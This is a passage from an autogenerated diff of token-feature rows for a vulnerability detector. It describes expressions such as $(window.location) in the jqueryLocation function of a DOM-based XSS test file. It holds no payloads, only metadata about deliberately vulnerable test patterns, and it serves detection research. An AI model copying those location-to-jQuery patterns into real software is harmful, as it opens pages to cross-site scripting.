element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17097,6 +118688,26 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:270:7:270:14 | location | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | | autogenerated/Xss/DomBasedXss/tst.js:270:7:270:14 | location | enclosingFunctionName | jqueryLocation | | autogenerated/Xss/DomBasedXss/tst.js:270:7:270:14 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:271:5:271:5 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:271:5:271:5 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:271:5:271:5 | $ | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | +| autogenerated/Xss/DomBasedXss/tst.js:271:5:271:5 | $ | enclosingFunctionName | jqueryLocation | +| autogenerated/Xss/DomBasedXss/tst.js:271:5:271:5 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:271:5:271:22 | $(window.location) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:271:5:271:22 | $(window.location) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:271:5:271:22 | $(window.location) | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | +| autogenerated/Xss/DomBasedXss/tst.js:271:5:271:22 | $(window.location) | enclosingFunctionName | jqueryLocation | +| autogenerated/Xss/DomBasedXss/tst.js:271:5:271:22 | $(window.location) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:271:5:271:22 | exceptional return of $(window.location) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:271:5:271:22 | exceptional return of $(window.location) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:271:5:271:22 | exceptional return of $(window.location) | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | +| autogenerated/Xss/DomBasedXss/tst.js:271:5:271:22 | exceptional return of $(window.location) | enclosingFunctionName | jqueryLocation | +| autogenerated/Xss/DomBasedXss/tst.js:271:5:271:22 | exceptional return of $(window.location) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:271:7:271:12 | window | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:271:7:271:12 | window | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:271:7:271:12 | window | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | +| autogenerated/Xss/DomBasedXss/tst.js:271:7:271:12 | window | enclosingFunctionName | jqueryLocation | +| autogenerated/Xss/DomBasedXss/tst.js:271:7:271:12 | window | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:271:7:271:21 | window.location | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:271:7:271:21 | window.location | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:271:7:271:21 | window.location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17104,6 +118715,31 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:271:7:271:21 | window.location | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | | autogenerated/Xss/DomBasedXss/tst.js:271:7:271:21 | window.location | enclosingFunctionName | jqueryLocation | | autogenerated/Xss/DomBasedXss/tst.js:271:7:271:21 | window.location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:271:14:271:21 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:271:14:271:21 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:271:14:271:21 | location | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | +| autogenerated/Xss/DomBasedXss/tst.js:271:14:271:21 | location | enclosingFunctionName | jqueryLocation | +| autogenerated/Xss/DomBasedXss/tst.js:271:14:271:21 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:272:5:272:5 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:272:5:272:5 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:272:5:272:5 | $ | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | +| autogenerated/Xss/DomBasedXss/tst.js:272:5:272:5 | $ | enclosingFunctionName | jqueryLocation | +| autogenerated/Xss/DomBasedXss/tst.js:272:5:272:5 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:272:5:272:24 | $(document.location) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:272:5:272:24 | $(document.location) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:272:5:272:24 | $(document.location) | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | +| autogenerated/Xss/DomBasedXss/tst.js:272:5:272:24 | $(document.location) | enclosingFunctionName | jqueryLocation | +| autogenerated/Xss/DomBasedXss/tst.js:272:5:272:24 | $(document.location) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:272:5:272:24 | exceptional return of $(document.location) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:272:5:272:24 | exceptional return of $(document.location) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:272:5:272:24 | exceptional return of $(document.location) | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | +| autogenerated/Xss/DomBasedXss/tst.js:272:5:272:24 | exceptional return of $(document.location) | enclosingFunctionName | jqueryLocation | +| autogenerated/Xss/DomBasedXss/tst.js:272:5:272:24 | exceptional return of $(document.location) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:272:7:272:14 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:272:7:272:14 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:272:7:272:14 | document | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | +| autogenerated/Xss/DomBasedXss/tst.js:272:7:272:14 | document | enclosingFunctionName | jqueryLocation | +| autogenerated/Xss/DomBasedXss/tst.js:272:7:272:14 | document | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:272:7:272:23 | document.location | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:272:7:272:23 | document.location | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:272:7:272:23 | document.location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17111,6 +118747,106 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:272:7:272:23 | document.location | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | | autogenerated/Xss/DomBasedXss/tst.js:272:7:272:23 | document.location | enclosingFunctionName | jqueryLocation | | autogenerated/Xss/DomBasedXss/tst.js:272:7:272:23 | document.location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:272:16:272:23 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:272:16:272:23 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:272:16:272:23 | location | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | +| autogenerated/Xss/DomBasedXss/tst.js:272:16:272:23 | location | enclosingFunctionName | jqueryLocation | +| autogenerated/Xss/DomBasedXss/tst.js:272:16:272:23 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:273:9:273:12 | loc1 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:273:9:273:12 | loc1 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:273:9:273:12 | loc1 | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | +| autogenerated/Xss/DomBasedXss/tst.js:273:9:273:12 | loc1 | enclosingFunctionName | jqueryLocation | +| autogenerated/Xss/DomBasedXss/tst.js:273:9:273:12 | loc1 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:273:9:273:23 | loc1 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:273:9:273:23 | loc1 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:273:9:273:23 | loc1 | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | +| autogenerated/Xss/DomBasedXss/tst.js:273:9:273:23 | loc1 | enclosingFunctionName | jqueryLocation | +| autogenerated/Xss/DomBasedXss/tst.js:273:9:273:23 | loc1 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:273:9:273:23 | loc1 = location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:273:9:273:23 | loc1 = location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:273:9:273:23 | loc1 = location | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | +| autogenerated/Xss/DomBasedXss/tst.js:273:9:273:23 | loc1 = location | enclosingFunctionName | jqueryLocation | +| autogenerated/Xss/DomBasedXss/tst.js:273:9:273:23 | loc1 = location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:273:16:273:23 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:273:16:273:23 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:273:16:273:23 | location | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | +| autogenerated/Xss/DomBasedXss/tst.js:273:16:273:23 | location | enclosingFunctionName | jqueryLocation | +| autogenerated/Xss/DomBasedXss/tst.js:273:16:273:23 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:274:9:274:12 | loc2 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:274:9:274:12 | loc2 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:274:9:274:12 | loc2 | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | +| autogenerated/Xss/DomBasedXss/tst.js:274:9:274:12 | loc2 | enclosingFunctionName | jqueryLocation | +| autogenerated/Xss/DomBasedXss/tst.js:274:9:274:12 | loc2 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:274:9:274:30 | loc2 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:274:9:274:30 | loc2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:274:9:274:30 | loc2 | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | +| autogenerated/Xss/DomBasedXss/tst.js:274:9:274:30 | loc2 | enclosingFunctionName | jqueryLocation | +| autogenerated/Xss/DomBasedXss/tst.js:274:9:274:30 | loc2 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:274:9:274:30 | loc2 = ... ocation | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:274:9:274:30 | loc2 = ... ocation | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:274:9:274:30 | loc2 = ... ocation | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | +| autogenerated/Xss/DomBasedXss/tst.js:274:9:274:30 | loc2 = ... ocation | enclosingFunctionName | jqueryLocation | +| autogenerated/Xss/DomBasedXss/tst.js:274:9:274:30 | loc2 = ... ocation | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:274:16:274:21 | window | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:274:16:274:21 | window | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:274:16:274:21 | window | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | +| autogenerated/Xss/DomBasedXss/tst.js:274:16:274:21 | window | enclosingFunctionName | jqueryLocation | +| autogenerated/Xss/DomBasedXss/tst.js:274:16:274:21 | window | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:274:16:274:30 | window.location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:274:16:274:30 | window.location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:274:16:274:30 | window.location | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | +| autogenerated/Xss/DomBasedXss/tst.js:274:16:274:30 | window.location | enclosingFunctionName | jqueryLocation | +| autogenerated/Xss/DomBasedXss/tst.js:274:16:274:30 | window.location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:274:23:274:30 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:274:23:274:30 | location | 